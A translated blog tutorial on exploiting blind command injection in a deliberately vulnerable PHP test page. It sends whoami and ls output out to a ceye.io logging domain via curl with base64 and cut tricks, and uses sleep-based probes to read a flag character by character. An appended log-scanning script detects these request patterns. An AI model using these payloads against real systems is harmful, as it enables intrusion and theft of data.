  • Command execution with no echo

    Command execution exists, but the result is not echoed back directly, so special commands are needed to carry the result out.
    
    <?php
    // Deliberately vulnerable test page: the cmd parameter is run through PHP's backtick
    // (shell_exec) operator and the output is discarded, so nothing is echoed to the client
    $cmd = $_GET['cmd'];
    `$cmd`;
    

    1. ceye.io

    You need to register an account; it then assigns you a domain.
    
    Visit:
    http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`whoami`
    
    Result of the execution (the request that arrives at ceye.io):
    http://snrkgl.ceye.io/www-data (the user name is www-data)
    



    Other cases:

    # ls -sl
    



    Execute:
    http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al`
    Result:
    http://snrkgl.ceye.io/total
    
    
    
    It looks like only the first line is carried out, so we need the sed command to select a line:
    http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al | sed -n '2p'`
    Result:
    http://snrkgl.ceye.io/drwxr-xr-x
    
    Spaces are not carried out either, so base64-encode the output:
    http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al | sed -n '2p'|base64`
    Result:
    http://snrkgl.ceye.io/ZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCA0MDk2IERlYyAyNyAxNDo1OSAuCg==
    Decoded: drwxr-xr-x 2 root root 4096 Dec 27 14:59 .
    
    If the output is sometimes too long, use cut to slice it by characters (the first character has index 1):
    http://106.13.124.93/test.php?cmd=curl http://snrkgl.ceye.io/`ls -al |cut -c 3-10`
    

    2. Reverse shell; nothing more to say about it.

    3. sleep

    # Mind the spaces; test environment is Ubuntu Server 16.04
    http://106.13.124.93/test.php?cmd=if [ 1 == 1 ];then sleep 2;fi
    http://106.13.124.93/test.php?cmd=if [ 1 == 2 ];then sleep 2;fi
    
    # Mind the spaces
    http://106.13.124.93/test.php?cmd=if [ $( whoami | cut -c 1) = 'w' ];then sleep 2;fi
    http://106.13.124.93/test.php?cmd=if [ $( whoami | cut -c 1) = 'r' ];then sleep 2;fi
    
    # Mind the spaces
    http://106.13.124.93/test.php?cmd=if [ $( cat flag | cut -c 1) = '1' ];then sleep 2;fi
    http://106.13.124.93/test.php?cmd=if [ $( cat flag | cut -c 1) = '2' ];then sleep 2;fi
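
    On the defending side, the requests in sections 1 and 3 leave recognisable shapes in the web server's access log. The following detector is an added example, not part of the original post: it decodes the cmd parameter from constructed Apache-style log lines (the client IP is a documentation placeholder; the /test.php?cmd= endpoint and the snrkgl.ceye.io subdomain are the post's own) and flags out-of-band curl exfiltration, base64-piped output and sleep-based timing probes.

```python
"""Flag the blind command-injection request shapes from sections 1 and 3 in web access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style log lines (not real traffic). The client IP is a
# documentation placeholder; /test.php?cmd= and snrkgl.ceye.io are the post's own.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Dec/2019:15:01:03 +0800] "GET /test.php?cmd=curl%20http://snrkgl.ceye.io/%60whoami%60 HTTP/1.1" 200 0
203.0.113.5 - - [27/Dec/2019:15:19:51 +0800] "GET /test.php?cmd=curl%20http://snrkgl.ceye.io/%60ls%20-al%20%7C%20sed%20-n%20%272p%27%7Cbase64%60 HTTP/1.1" 200 0
203.0.113.5 - - [27/Dec/2019:15:30:00 +0800] "GET /test.php?cmd=if%20%5B%20%24(%20whoami%20%7C%20cut%20-c%201)%20%3D%20%27w%27%20%5D%3Bthen%20sleep%202%3Bfi HTTP/1.1" 200 0
203.0.113.5 - - [27/Dec/2019:15:31:00 +0800] "GET /index.php?page=home HTTP/1.1" 200 512
"""

# Combined-log prefix: client, timestamp, method, request path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

# One rule per technique shown in the post, matched against the decoded cmd value.
RULES = {
    # curl/wget to a URL that embeds a command substitution: curl http://host/`cmd`
    "oob-exfil": re.compile(r"\b(curl|wget)\b\s+\S*https?://\S*(`|\$\()"),
    # time-based probe: if [ ... ];then sleep N;fi
    "time-based": re.compile(r"\bif\s+\[.*\]\s*;\s*then\s+sleep\s+\d+"),
    # output piped through base64 so whitespace survives the URL
    "base64-pipe": re.compile(r"\|\s*base64\b"),
}

def decode_cmd(request_path):
    """Return the URL-decoded cmd parameter of a request path, or None if absent."""
    values = parse_qs(urlsplit(request_path).query).get("cmd")
    return values[0] if values else None

def scan(log_text):
    """Return (ip, timestamp, technique, decoded_cmd) for every rule hit, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = decode_cmd(m["path"])
        if cmd is None:
            continue
        for name, rule in RULES.items():
            if rule.search(cmd):
                findings.append((m["ip"], m["ts"], name, cmd))
    return findings

if __name__ == "__main__":
    for ip, ts, technique, cmd in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {technique}: {cmd}")
```

A single source address hitting the time-based rule repeatedly with only the compared character changing is the signature of the character-by-character probing shown in section 3.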
    
  • Original URL: https://www.cnblogs.com/zaqzzz/p/12108137.html